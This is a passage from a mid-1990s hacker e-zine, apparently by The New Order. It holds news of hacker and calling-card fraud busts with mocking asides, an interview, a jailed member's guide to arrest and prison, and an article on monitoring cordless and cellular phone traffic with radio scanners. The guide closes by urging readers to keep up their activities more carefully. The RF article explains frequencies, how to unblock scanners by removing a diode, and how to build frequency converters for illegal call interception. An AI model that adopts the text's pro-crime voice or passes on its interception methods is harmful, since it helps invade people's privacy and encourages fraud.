  754.  
  755. "INTERVIEW WITH A CRYPTKEEPER"
  756.  
  757. ck: I only got busted last February (1994) for hacking
  758.  
  759. dis: I heard you got hit twice.. once last year, and once a lot more
  760.      +recently..
  761.  
  762. CK: nope, I moved, I didn't get busted. I only got busted last year,
  763.     once, that's it. And it wasn't real serious.. not like cellphone/money
  764.     laundering..just some inet hacking. I got busted for hacking the
  765.     University of Cincinnati and a few other things on the net.. they
  766.     traced me through a PBX.. they were serious. They thought I was
  767.     a spy. they were pissed to find out I was just a 16 year old.
  768.  
  769. dis: hmm... bad.. did they just search/seize or what?
  770.  
  771. ck: search/seized my computer.. I eventually got most of my stuff back
  772.     (the computer, monitor, and keyboard) and had to spend 10 days in
  773.     juvenile thats about it.  oh.. and a big pain in the ass too of
  774.     course not bad at all..
  775.  
  776. dis: anything else?
  777.  
  778. ck: and tell them I was only busted ONCE, and it wasn't all that serious.
  779.     I don't have any plans to get back into the scene (it sux now), but
  780.     I do enjoy hearing about it sometimes.
  781.  
  782. =-=
  783.  
  784. "FEDZ CATCHING ON TO CALLING CARD SKAMS"
  785.  
  786.          A $50 million telephone calling-card theft ring disclosed
  787. earlier this week by federal investigators is representative of the advanced
  788. types of scams that have emerged in the last two years as telephone companies
  789. have become better at ferreting out fraud.
  790.  
  791. The Secret Service said Ivy James Lay, a switch engineer at MCI's network
  792. center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
  793. and other long distance companies, later selling them to 'band of computer
  794. hackers.' The estimated value of the cards lies near $50 million. The
  795. Secret Service (which investigates fraud like this) claims this to be the
  796. largest case of calling card theft to date.
  797.  
  798. =-=-=
  799.  
  800. "SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
  801.  
  802. Two computer hackers have been sentenced to fed. prison and an accomplice in
  803. Mn. awaits sentencing for his part in an international phone conspiracy.
  804. Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C.,
  805. were part of a hacker ring that stole credit-card numbers from MCI's
  806. Computer terminal in Greensboro. A third member of the ring, Leroy James
  807. Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
  808. copyright violations.
  809.  
  810. US District Court Judge James Beaty on Fri. sentenced Lay to tree years
  811. and two months in prison. Stanton, a 22-year-old student at Wingate College,
  812. was sentenced to one year. Anderson's sentencing is expected this summer.
  813.  
  814. The conspiracy stretched into several European countries and cost long-
  815. distance carriers more than $28 millon, authorities said.
  816.  
  817. Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
  818. in unauthorized access devices. The group bought and sold at least 50,000
  819. numbers from 1992 until the summer of 1994, according to court documents.
  820.  
  821. "What I did was very stupid," Stanton told Judge Beaty at his sentencing.
  822. "I'd like to go back and finish college."
  823.  
  824. =-=-=
  825.  
  826. "SHOCKER[303] GETS NAILED FOR CC'S"
  827.  
  828. Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
  829. bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
  830. listened to you. Fuck me. Got my mac taken away, I am writing this from a
  831. friends, I am not supposed to be here either, but hell, I got everything taken
  832. away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
  833. happens, I'll call you sometime if I can get to the phone w/out my parents
  834. knowing. I can't have anything back until I pay for this shit, I think it is
  835. between $400 and $500, not sure, I already paid $170, but then I hafta
  836. fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
  837. got like, a felony and a second degree misdemeanor for that shit, they
  838. will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
  839. and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
  840. see ya ok? Bye..
  841.  
  842. =-=-=
  843.  
  844. "NYHE RUMORS"
  845.  
  846. The New York Hack Exchange got busted for scams and cellfonez...
  847.  
  848. (Someone mail me with more than a rumor please)
  849.  
  850. =-=-=
  851.  
  852. "WAREZ BOARD BUSTS AROUND THE COUNTRY"
  853.  
  854.                Bad Sector           [BUSTED!]
  855.                Beyond Corruption    [BUSTED!]
  856.                Jurrasic Park        [BUSTED!]
  857.                Lineup               [BUSTED!]
  858.                Main Frame           [BUSTED!]
  859.                Necronomicon         [BUSTED!]
  860.                No BBS               [BUSTED!]
  861.                The Notice           [BUSTED!]
  862.                On The World         [BUSTED!]
  863.                Perfect Crime        [BUSTED!]
  864.                Red Alert            [BUSTED!]
  865.                Restricted Area      [BUSTED!]
  866.                Rubbish Heap         [BUSTED!]
  867.                Skull Island         [BUSTED!]
  868.                Twins                [BUSTED!]
  869.                The Underworld       [BUSTED!]
  870.                Wolf Pack            [BUSTED!]
  871.  
  872. 15 Arrests
  873. 75 RCMP Officers Involved
  874. Removed at least 11 BBSs in one day
  875. Seized more than $200,000 in computer hardware
  876. Operation/Investigation lasted 6 months to 1 year
  877. April 12, 1995
  878. Busts are localized in Montreal
  879. 514 NPA
  880.  
  881. =-=-=
  882.  
  883. "DUTCH HACKER ARRESTED"
  884.  
  885. (from CUD 7.21):
  886.  
  887.             --------------Original message----------------
  888.  
  889. UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
  890. become the first person to be convicted of computer hacking in the
  891. Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
  892. student, was handed down a six month suspended sentence by
  893. magistrates last week, and was fined around $3,200
  894.  
  895. Oosteveen was accused of breaking into university, corporate and
  896. government computers, following his arrested in March, 1993, just
  897. three weeks after new Dutch anti-hacking legislation came into force.
  898.  
  899. Oosteveen was caught in the act of trying to hack into the computer
  900. lines of a technical university in Delft near The Hague. He is also
  901. thought to have been responsible for previous hacking attacks which
  902. occurred before the new legislation came into force.
  903.  
  904. =-=-=
  905.  
  906. "THE EAST COAST"
  907.  
  908. Tabas and Others Bust:
  909.  
  910. According to Gatsby, the following were busted: Himself, Mark Tabas
  911. KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
  912.  
  913. (When I talked to him, he wasn't able to say much since it was the day
  914. after the bust)
  915.  
  916. From empire Times:
  917. February 22, 1995
  918.  
  919. One thing all the people have in common:  Southwestern Bell - or at the very
  920. least, the desire and ability to hack all the switches on the west coast.
  921.  
  922. According to those involved, it goes way beyond switches...
  923.  
  924. =-=-=
  925.  
  926. "THE LAMACCHIA CASE"
  927.  
  928. April 94:
  929.  
  930. BOSTON, MA ...A federal grand jury returned a felony indictment today
  931. charging an MIT student in a computer fraud scheme resulting in the piracy of
  932. an estimated million dollars in business and entertainment computer software.
  933.  
  934. United States Attorney Donald K. Stern and FBI Special Agent In
  935. Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
  936. currently a junior at the Massachusetts Institute of Technology, was charged
  937. in a one count felony indictment with conspiring to commit wire fraud.  The
  938. indictment charges that between November 21, 1993 and January 5, 1994
  939. LAMACCHIA operated a computer bulletin board service that permitted users
  940. to copy copyrighted business and entertainment software without paying to
  941. purchase the software.  The bulletin board was operated without authorization
  942. on MIT computer work stations and was accessible to users worldwide over the
  943. Internet...  [Losses] are estimated to exceed a million dollars. [bahaha]
  944.  
  945. =-=-=
  946.  
  947. "BRITISH CALLING CARD BUST"
  948.  
  949. British students have taken part in an alleged ú65m computer fraud,
  950. involving the electronic theft of cards that allow users to make free
  951. telephone calls around the world.
  952.  
  953. The hackers, one of whom was only 17 years old, were said to be earning
  954. thousands of pounds a month selling cards...  Police found one teenager
  955. driving a new ú20,000 car and with computer equipment worth ú29,000 in his
  956. bedroom.
  957.  
  958. AT&T officials also found a computer noticeboard called "Living Chaos"
  959. that was being used to sell the cards for up to ú30 each.  It mentioned
  960. Andy Gaspard, an employee of the Cleartel telephone company in
  961. Washington, whose home was raided.  "We found 61,500 stolen cards ready
  962. to be sent to Britain," said Eric Watley, a secret service agent in the city.
  963.  
  964. (The Sunday Times, 12 February 1995)
  965.  
  966. =-=
  967.  
  968. "TNO BUST OF 1994 - NEW NEWS"
  969.  
  970. (my comments in [ ])
  971.  
  972.                           ROCKY MOUNTAIN NEWS
  973. (Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
  974.         Quartet accused of hacking into Arapahoe college's system,
  975.                         inciting illegal acts.
  976.  
  977. ---------------------------------------------------------------------------
  978. (Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
  979. Suspects used equipment at college to incite criminal acts, officials say.
  980.  
  981. Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!]
  982. allegedly gained access to the Arapahoe Community College computer and
  983. used it to distribute tips on how to commit crimes.
  984.         One man operated a computer bulletin board on which contributors
  985. from throughout the world exchanged how-to information on crimes ranging
  986. from credit-card fraud to high-tech burglary, authorities said. [Of course
  987. they fail to make that distinguishing gap that this board was NOT run off
  988. the Arapahoe system, and that it was a private BBS run out of his house]
  989.         Computers were seized from the homes of four hackers, ranging in
  990. age from 15 to 21.  Secret Service experts were called in to help crack
  991. the computer files. ['type filename.txt' is hard to crack eh?]
  992.         Investigators found software for breaking passwords, lists of
  993. private passwords for several computer systems, instructions for cellular
  994. telephone fraud, private credit reports [Plural? Nope], lists of credit-card
  995. numbers and electronic manuals on how to make bombs and illegal drugs.
  996. [Yes, WE did the oklahoma bombing!@$!]
  997.         In a 97-page affidavit detailing the 18-month investigation,
  998. investigator John Davis of the Arapahoe district attorney's office said
  999. that the hackers "operate with an attitude of indifference to the rights
  1000. and privacy of others and have made efforts to teach and involve others in
  1001. their criminal enterprise." [What the fuck does the government do everyday?]
  1002.         At the home of a Denver juvenile, authorities found hazardous
  1003. chemicals and a book on how to make bombs.
  1004.         Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
  1005. of Thornton, were charged last month with committing computer crimes and
  1006. conspiracy.  Both are scheduled to appear in Arapahoe County Court on July
  1007. 5.
  1008.         A decision is pending on whether to charge a 15-year-old Highlands
  1009. Ranch youth and a 17-year-old Denver resident, chief deputy district
  1010. attorney John Jordan said Friday.
  1011.         The affidavit says Papadenis, Jackson, and the youths hacked into
  1012. the Arapahoe County Community College computer system, then used it to
  1013. illegally distribute copyrighted computer games [Sorry, TNo doesn't have
  1014. a warez division yet] and electronic magazines promoting fraud, theft,
  1015. burglary and money-laundering.
  1016.         One of the magazines stated, "This publication contains information
  1017. pertaining to illegal acts.  The use of this information is intended solely
  1018. for evil purposes." [Source: CoTNo 1!@#!@]
  1019.         Court documents do not indicate the hackers had political motives,
  1020. and authorities declined to comment on the case. [Hackers with political
  1021. motives would be way above their head.]
  1022.         A Denver University expert said computer criminals usually are not
  1023. motivated by ideology.  They usually are young people who are "doing it for
  1024. the sheer challenge of it - just to demonstrate that they're able to do it,"
  1025. said Don McCubbery, director for the center on electronic commerce at DU.
  1026.         McCubbery estimates that authorities learn of only 5% of computer
  1027. crimes.  He said computer security experts generally have difficulty
  1028. keeping up with the hackers. [No shit]
  1029.  
  1030.             -----------------------------------------------
  1031.             (Side note box)  THE NEW ORDER (Bullet listing)
  1032.  
  1033. Some accusations listed in court documents concerning The New Order group
  1034. of computer hackers:
  1035.         - A hacker from the United Kingdom offered suspect John Jackson
  1036.           a VISA card number with a $300,000 credit limit. [Tacos anyone?]
  1037.         - A computer seized from a Highlands Ranch home contained password
  1038.           files for computer systems at the University of Colorado
  1039.           at Boulder.
  1040.         - A note found in Jackson's home indicated his plans to hack into
  1041.           the Thornton Police Department computer. [Yes, they believe
  1042.                                                     everything they read]
  1043.         - Jackson also had a computer file containing access information
  1044.           for Taco Bell and McDonald's computers.  [There goes national
  1045.                                                                security!]
  1046.  
  1047. =-=
  1048.  
  1049.         That is all for now. Not a good year by any means as you can tell,
  1050. especially considering who else may have been busted, that we didn't hear
  1051. about. Don't stop what you are doing though, just be more careful of
  1052. your activities. YOU are right, THEY are wrong.
  1053.  
  1054.  
  1055. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  1056.  
  1057.  
  1058.  
  1059.                  What Happens When You Get Caught
  1060.                  --------------------------------
  1061.           [A.K.A  The Hackers Guide to the Law and Prisons]
  1062.  
  1063.                                 by
  1064.  
  1065.             D. Fanning - A.K.A. John Falcon/Renegade - TNO
  1066.  
  1067.  
  1068. Well if you are reading this, that means you are either curious or shit
  1069. happened and the law reared it's ugly head and they nabbed you.  Now what
  1070. you are about to read is absolutely fucking true.  Why is this?  Because I
  1071. am spending the next year or so in prison for hacking.  Now needless to
  1072. say, I have already announced my retirement from the scene, but I still
  1073. wanted to write and rant and rave about all the things that happen in this
  1074. world and to clue you in on a quite a few things.
  1075.  
  1076. Let's start with the ground rules:
  1077.  
  1078. 1.  You cannot make a deal with a cop.  So when they start reading Miranda
  1079.     rights, keep silent or just ask inconspicuous questions like "Where are we
  1080.     going?", or the common ne, "What's going on here?  Why am I being charged?"
  1081.  
  1082.     Only a D.A. or someone in the lawyer capacity can make a deal.  If a
  1083.     cop offers a deal, you are still going to get charged.  Cops cannot
  1084.     make any exceptions on anyone.  So drop all ideas of such.
  1085.  
  1086. 2.  Do not narc on anyone when the questioning starts.  Your best bet would
  1087.     be to just stay silent till the lawyer shows up or something.  Why?
  1088.     Questioning wouldn't be done unless there were gaps in their
  1089.     investigation.  What you want is as many of those as possible.  The
  1090.     more you have, the better it will be when plea bargaining starts up.
  1091.     At the very least though, lets say the they do convict you, the feds
  1092.     and the court find you guilty or you plea that way and you are thrown
  1093.     into the clink.  Guess who does your admissions paperwork? You guessed
  1094.     it, the inmates.  Word has a way of coming around to dealing or giving
  1095.     a very wide berth to those who do the narc thing  Key idea:  "If you
  1096.     fall, don't bring others down too.  It just adds to the load on you."
  1097.  
  1098. 3.  During questioning, they will put on a lot of plays to make you talk,
  1099.     they will offer you something to drink or something to make you feel
  1100.     more comfortable.  Well why not?  Spend 60 cents and get your work done
  1101.     for you by a confession.  Makes things nice and neat.  Don't fall for
  1102.     it.  If you are thirsty, accept the drink and don't tell them shit.
  1103.  
  1104. 4.  They will also do some kind of powerplay on you.  They try to make you
  1105.     think that they are doing you a favor, but in reality, you are digging
  1106.     a deeper hole for yourself.
  1107.  
  1108. 5.  The idea of you being innocent until proven guilty has gone the way of
  1109.     the do-do bird.  When a jury sees you, the first thought that comes to
  1110.     mind is not if you are guilty or not, the question is HOW guilty you
  1111.     are.  The way they see it, if you are not guilty, what are you doing
  1112.     in front of them in the first  place?  The O.J. Simpson trial is a
  1113.     perfect example.  Also, look how many cop shows are around the box.
  1114.     That right there is a disgrace in my book.  First they have you on
  1115.     film, second they pat each other on the back while you are in
  1116.     misery.  Sick.
  1117.  
  1118. Well on with the show.  If they have already done an investigation on you
  1119. and you don't hear from them in a while, the first natural reaction would
  1120. be to relax and let your guard down.  WRONG ANSWER!  That means that some
  1121. shit is really going to go down.  You should be extra careful and not
  1122. talk about it to anyone.  Most likely they are looking for more evidence
  1123. to make it harder on you in the long run, like a wiretap.  In the federal
  1124. system, all you need is one person's permission to record a phone call.
  1125. If you have to talk about it, use face to face contact and pat each other
  1126. down to make sure there is no bug. For instance, when I was arrested I made
  1127. a fatal mistake and  talked about it to one of the co-defendants and he
  1128. had cut a deal with the D.A. already.  My bacon was cooked when I heard
  1129. my voice on a tape recording.
  1130.  
  1131. Well no matter what happens, sooner or later you will get nabbed so I won't
  1132. get into the details of this.  All I can suggest is that you really do
  1133. what ever you can to get a real attorney.  P.D.'s are good for some
  1134. things but they get their paycheck from the same place that nabbed you in
  1135. the first place so don't let that fool you too much.  I will admit that
  1136. it is better than nothing though.
  1137.  
  1138. Most likely for the computer hackers out there, they will charge you
  1139. under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access
  1140. Device.  This charge was mainly intended for credit cards but the D.A.'s
  1141. have taken it to just about everything that involves computers or
  1142. communications in general.
  1143.  
  1144. Now there are some landmark cases that have beat this into the ground.
  1145. One of them being U.S. vs Brady which was a guy making satellite decoders
  1146. with the stops pulled out of them.  He beat this due to the ruling that
  1147. the signal was out there everywhere and that he merely just decoded the
  1148. signal.  Therefore there was no actual loss, just potential loss which
  1149. doesn't count.  Another one is U.S. vs McNutt in the 10th Circuit of
  1150. Utah.  This guy made chips for cellular phones that would send different
  1151. ESN/MIN pairs to the cell site that made it always seem like a new roamer
  1152. every time he calls.  The cell site just goes ahead and gives him the call
  1153. because it doesn't have time to verify if it is a valid MIN/ESN pair.  He
  1154. won the case due to the same fact that there were no accountable loss
  1155. because it never used or really billed any legit customer.
  1156.  
  1157. The flip side of that is being two weeks ago from when this was written,
  1158. a guy was tried in LA for the exact same thing and was found guilty,
  1159. appealed the case, won the appeal, then the government re-appealed it and
  1160. he lost again.  This caused a split in the court circuits which means
  1161. that this will got the Supreme Court.
  1162.  
  1163. Remember that the government or any government agency will not press any
  1164. issue unless there is some kind of financial deal behind it because they
  1165. are wasting time and resources on you when they can be getting Joe Blow
  1166. Cartel Drug Dealer.
  1167.  
  1168. So they find you guilty or you plea.  The next step is the Pre-Sentence
  1169. Investigation.  They basically take a fine tooth comb and find any dirt
  1170. about you that they can.  You will be amazed about all the things they
  1171. can do to make you seem like a threat to society, the American way of
  1172. life, apple pie and all...  All you can do is make sure or try your
  1173. hardest to make it clean as possible.  Now I got ripped hard on mine due
  1174. to very strained relations with one of my parents and they managed to
  1175. throw everything that anyone had ever said about me together to make it
  1176. look like I was truly evil.  That is where the cops will come back and
  1177. haunt you because everything you say will be in that report.  Every
  1178. little action and all will be written with a slant of a cop.  (Needless to
  1179. say who writes the report kids...  The U.S. Probation Office, a branch of
  1180. the Secret Service and the F.B.I.)
  1181.  
  1182. Well you are convicted and here you are.  Depending on where you live,
  1183. you will either be bussed/vanned to the prison where they choose for
  1184. you or they will fly you there.  After you are sentenced you now belong
  1185. to the Bureau of Prisons (A D.O.J. branch).  Basically you will be taken
  1186. to a county jail for holding while they classify you and then you get
  1187. transported out.  When I was transported out, I was in shackles and all
  1188. taking a ride on Fed Air.  The USM's have a fleet of 737's they confiscated
  1189. from drug busts and converted them into their own use.  You are basically
  1190. bussed out to a unused or empty part of the airport and with a large ring of
  1191. USM's with shotguns in their hand, you get put onto an airplane and given a
  1192. box lunch and off you go.  I went from Portland to Sacramento to Phoenix
  1193. in one day.  Spent the night at the FCI in Phoenix then the next morning
  1194. from there to Lompoc where I am now.
  1195.  
  1196. Remember these words though... You are now property of the B.O.P.  Basically
  1197. you are luggage, they can transport you at any time whenever they want to.
  1198. But, depending on where you go, it isn't all that bad.  Most likely you will
  1199. meet friends or acquaintances that will help you along.  Just ask a few
  1200. questions and usually they will know.  One thing to never do is be secretive
  1201. about why you are there.  You are there, most likely someone else is there
  1202. for the same thing and you can get a strong fellowship going with people
  1203. in the same predicament.
  1204.  
  1205. One thing to always keep in mind from now to eternity, no matter where you go.
  1206. The feds are nailing everyone for 'Conspiracy'.  It's a damn shame when
  1207. you go to a place where 90 percent of the inmate population is here on some
  1208. kind of drug related charge and of that 90%, 35% are here on conspiracy
  1209. related charges. Truly something to think about.
  1210.  
  1211. Now for the hackers and phreakers that are facing jail.  If your PSI report
  1212. even breaths any mention of some kind of use with the computer, you will be
  1213. banned from that.  3 days ago I was given a list of direct orders to avoid
  1214. all contact of that.  Likewise, they put a restriction on the levels of
  1215. computer related material that I can read.  Usually you can get any
  1216. periodical you want except for things that deal with gay man on man stuff.
  1217. Just like the gay people feel, that smells of discrimination but that's
  1218. just the way it is.
  1219.  
  1220. Phones are something else that you will wish that changes real quick.  The
  1221. phones are run by a B.O.P. thing called ITS-Inmate Telephone Services.
  1222. Basically it's a Unix run PBX that limits the people you can call and it
  1223. throws the bill on you.  No more collect calls or anything of that nature.
  1224. Just doesn't happen.  But the inmates have won a Class action suit against
  1225. the B.O.P. about this and the government right now is appealing it.
  1226. Technically with a suit or even an appeal, you have to implement it
  1227. as soon as you can after the judgement is made.  But it's been a year
  1228. since they won it and nothing changes.  Basically it's the government stalling.
  1229.  
  1230. Well that's all for me to say this time around.  Remember to keep the dream
  1231. alive and judge for yourself with that piece of gray matter between your
  1232. ears.
  1233.  
  1234. You can write any comments to me at:
  1235. Fanning
  1236. Reg No. 12617-006
  1237. 3600 Guard Road
  1238. Lompoc, CA 93436
  1239.  
  1240. or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
  1241. (I prefer the first method to save my friends postage costs.)
  1242.  
  1243. Keep it strong - TNO (The New Order)
  1244.  
  1245. John Falcon - Ex-TNo
  1246. 1981-1994
  1247.  
  1248.  
  1249. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  1250.  
  1251.  
  1252.  
  1253.           --- Legal and Technical Aspects of RF Monitoring ---
  1254.  
  1255.                             --- Major [TNo] ---
  1256.  
  1257.  
  1258.  
  1259. SYNOPSIS
  1260. --------
  1261. The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article
  1262. doubtlessly sparked an interest in cordless phone monitoring.  Wireless
  1263. telephones are a prime target for monitoring.  Both cordless and cellular
  1264. telephones are nothing more than radio transceivers that, at some point,
  1265. interface with the telephone system.  This article will seek to expand on
  1266. and clarify some points made in "Cordless Fun", and also to point to some
  1267. other areas of interest.
  1268.  
  1269. =============================================================================
  1270.  
  1271.  
  1272. CORDLESS
  1273. --------
  1274. Legal Stuff:
  1275. Monitoring cordless phones is now a federal crime!  Recent legislation
  1276. prohibits listening in on cordless phones, much the same as cellular phones.
  1277. Also, the Communications Act of 1934 makes it a crime to divulge
  1278. anything you monitor to another person.  It is also illegal to use anything
  1279. that you hear for personal gain.  Note that this applies to anything that you
  1280. monitor, not just cordless phones.  Alternatively, there are presently no
  1281. restrictions on scanners that are capable of receiving cordless phone
  1282. frequencies.  However, I suspect that in the near future the feds will deny
  1283. certification to such scanners, as they did with scanners that could receive
  1284. cellular frequencies.
  1285.  
  1286. Technical Stuff:
  1287. Cordless telephones transmit and receive with very low power.  This is
  1288. primarily to minimize interference with other nearby cordless telephones.
  1289. This makes scanning for cordless telephones a short-range endeavor.  Most
  1290. cordless phones of recent manufacture operate in the 46-49MHz range.
  1291. However, the FCC has recently opened up a part of the 900MHz spectrum for
  1292. cordless telephone usage.  The new 900MHz phones often offer greater range
  1293. and increased clarity.  There are also models sporting "spread-spectrum"
  1294. technology, which makes monitoring with conventional scanning-receivers a
  1295. virtual impossibility.  Another security measure on some cordless phones
  1296. involves encoding the DTMF tones sent from the handset to the base.  This
  1297. prevents the base from accepting tones from other, unauthorized, handsets.
  1298. It does not hinder monitoring the calls, but the DTMF tones will not be
  1299. recognizable.  In the 46-49MHz phones, there are ten frequency pairs
  1300. available.  Many older phones only utilize one pair.  Newer, more expensive,
  1301. phones can utilize all ten pairs.  Some automatically search for an open
  1302. channel, while others can be manually manipulated to find a channel with less
  1303. noise.  Likewise, the new 900MHz phones will scan to find a clear channel.
  1304.  
  1305.  
  1306. CELLULAR
  1307. --------
  1308. Legal Stuff:
  1309. Intercepting cellular mobile telephone (CMT) traffic is illegal.  The
  1310. Electronic Communications Privacy Act of 1986 made it so.  Scanners that
  1311. receive the CMT portion of the 800MHz range may no longer be manufactured,
  1312. sold, or imported into the U.S.  Many scanners were designed to scan this
  1313. area, though.  When the Cellular Telephone Industry Association began
  1314. complaining about this fact, most scanner manufacturers/resalers voluntarily
  1315. "blocked" the cellular freqs from their scanners.  This pacified the CTIA for
  1316. a while, but the "blocks" were easily hackable.  Typically, restoring a
  1317. "blocked" scanner involved removing a single diode, a ten minute job for even
  1318. the most devout technophobe.  This fact led to the passage of the Telephone
  1319. Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C.
  1320. certification of scanners that receive cellular freqs, or those which may be
  1321. easily modified to do so.  New scanners will be "blocked" at the CPU, and
  1322. hacking them is unlikely.  Frequency converters offered another means of
  1323. monitoring cellular and other 800MHz traffic.  Essentially, a converter
  1324. receives an 800MHz signal, and converts it to a 400MHz signal that the scanner
  1325. is capable of receiving.  Converters are useful for scanners that have no
  1326. 800MHz reception capabilities, as well as those that have portions of the
  1327. 800MHz band blocked.  Unfortunately, converters were also outlawed by the
  1328. TDDRA.  They are still legal in kit-form, however.  Another option would be
  1329. to build one from scratch, which isn't an especially difficult project.
  1330.  
  1331. Technical Stuff:
  1332. The word "cellular" defines the cellular phone system.  A service area is
  1333. broken up into many small cells.  As a user travels through an area, his call
  1334. will be handed off from one cell to the next.  This handoff is transparent to
  1335. the user, but a monitor will lose the conversation.  Cellular phones use low
  1336. power (a maximum of five watts) so that a cell phone will not attempt to seize
  1337. more than one site at a time.  When a call is initiated by a cell phone, the
  1338. nearest site will respond, and assign an available frequency to the phone.
  1339. When the user moves comes into range of the next site, the process repeats
  1340. itself, and the new site will assign a new frequency.  Therefore, it can be
  1341. difficult to track a particular conversation as it moves from site to site
  1342. with a single scanner.  Every area served by cellular phones will have two
  1343. service providers.  One will be the local RBOC, while the other will be a
  1344. cellular-only provider.  The two systems are designated as "A" and "B"
  1345. systems, or "Wireline" and "Non-Wireline".  There is no difference between
  1346. the two for monitoring purposes, but since "A" and "B" carriers use different
  1347. frequencies, it should be possible to identify local cell-towers as being "A"
  1348. or "B" sites.
  1349.  
  1350.  
  1351. PHONE PATCH
  1352. -----------
  1353. Legal Stuff:
  1354. The Communications Act of 1934 applies here as well, but there are no other
  1355. prohibitions on monitoring business-band phone patches.
  1356.  
  1357. Technical Stuff:
  1358. Many business radio systems have the ability to tie into the phone
  1359. system.  Most of these systems will be found in 800MHz trunked
  1360. radio systems.  In a conventional radio system, one frequency will
  1361. equal one channel.  In a trunked system, however, frequencies and
  1362. channels are independent of each other.  The trunking computer will
  1363. assign a different frequency to a radio each time it transmits,
  1364. and it will send a signal to other radios on the same channel,
  1365. telling them the current frequency in use.  Phone patches are easy
  1366. to monitor, though.  Since the radio on a phone patch is
  1367. transmitting constantly, the frequency used will remain the same
  1368. for the duration of the conversation.  Many people mistakenly
  1369. believe these calls to be cellular, but they are not.  Most phone
  1370. patches found in 800MHz trunked systems will be full-duplex, just
  1371. like cellular and home phones.  Some systems, especially in UHF
  1372. (around 450MHz) and 800MHz conventional radio systems will only be
  1373. half-duplex, though.  In those systems, only one person call talk
  1374. at a time, just like normal two-way radios.  Radio systems are
  1375. typically designed to offer service to an entire metropolitan area,
  1376. so range is quite good.  The mobile radio will transmit its signal
  1377. to a strategically located "repeater", which then re-broadcasts the
  1378. signal with much more power.  So long as a scanner is within
  1379. reception range of the repeater output, monitoring will be possible
  1380. regardless of the location of the party transmitting.
  1381.  
  1382.  
  1383.  
  1384. EQUIPMENT
  1385. ----------
  1386. Legal Stuff:
  1387. Some states prohibit mobile use of scanners.  Also, it is illegal
  1388. to use a scanner in the commission of a crime.
  1389.  
  1390. Technical Stuff:
  1391. There is a scanner for every appetite.  What sort of monitoring
  1392. one wants to do will dictate which scanner one buys.  For someone
  1393. interested only in cordless phones, a ten-channel scanner with no
  1394. 800MHz coverage will be quite adequate, and much cheaper than a
  1395. more capable scanner.  For someone interested in cellular, a full-
  1396. coverage 800MHz scanner with a much greater frequency storage
  1397. capacity will be necessary.  Base, mobile or handheld?  Depends
  1398. entirely on how it will be used.  Modern scanners are programmable,
  1399. while older units require crystals.  For someone wanting to monitor
  1400. only a few channels (such as cordless phones, or the local police),
  1401. a crystal-controlled scanner would be adequate, and much cheaper.
  1402. But for more serious and varied scanning, programmable units are
  1403. a necessity.  Models are available that store between 10 and 1000
  1404. channels.  Uniden/Bearcat and Realistic are the two most commonly
  1405. available brands in the U.S. (although Realistic isn't actually a
  1406. brand, just a label...Radio Shack scanners are all manufactured by
  1407. Uniden or GRE, depending on the model).  Because of the TDDRA, many
  1408. of the best scanners from the past several years are no longer
  1409. available, but watch for Hamfests (great electronic flea-
  1410. markets...inquire at your local ham radio/electronics store),
  1411. garage sales, etc.  There is nothing in the TDDRA or other current
  1412. legislation that prevents private parties from owning or selling
  1413. pre-TDDRA equipment.  Aside from the scanner itself, the next-most
  1414. important piece of equipment is the antenna.  Handheld scanners
  1415. will generally utilize an "all-band" rubber-duck antenna (a
  1416. flexible, rubberized antenna, between 8-14" in length), while base
  1417. units will have a telescoping metal whip antenna.  These antennas
  1418. are adequate for receiving strong, local signals, but more
  1419. discriminating monitors will demand more.  For base units, an all
  1420. band discone type antenna, mounted outside as high as practical,
  1421. will offer good, omnidirectional performance.  For those who only
  1422. want to monitor a particular band, it would be best to use an
  1423. antenna cut specifically for that band.  Likewise, for those
  1424. monitoring signals coming from one general direction, a directional
  1425. antenna will offer better performance than an omnidirectional unit.
  1426. For mobile use, using an antenna mounted on the vehicle will
  1427. greatly improve reception.
  1428.  
  1429.  
  1430. MISCELLANEOUS COMMUNICATIONS
  1431. ----------------------------
  1432. Voice-pagers can offer interesting monitoring.  While the data-
  1433. transmissions that send the signal to the proper pager are
  1434. proprietary digital signals (and as such, illegal to monitor or
  1435. decipher), the actual "voice messages" are transmitted "in the
  1436. clear".
  1437. Packet-radio is used by ham radio operators.  They have a vast
  1438. network of computer bbs's that operate independently of the phone
  1439. system.  Modulated data is sent over the airwaves with a ham
  1440. transceiver, where it is received and de-modulated with a Terminal
  1441. Node Controller (TNC).  Expect the use of wireless data
  1442. transmissions to increase over the next few years, and not just
  1443. among ham operators.
  1444. While not having anything to do with telephones, the "baby
  1445. monitors" people use are transmitters just like cordless phones.
  1446. They are also low-power devices, so range is limited.  Most people
  1447. who use these devices would be shocked to learn that they are
  1448. "bugging" their own home.
  1449.  
  1450. PRESENT AND FUTURE CHALLENGES
  1451. -----------------------------
  1452. Spread spectrum, digital transmissions, encryption...these are all
  1453. factors that are affecting monitoring today.  While most cellular
  1454. systems are presently analog systems, there are operational digital
  1455. systems in some areas.  Scanners that are currently available won't
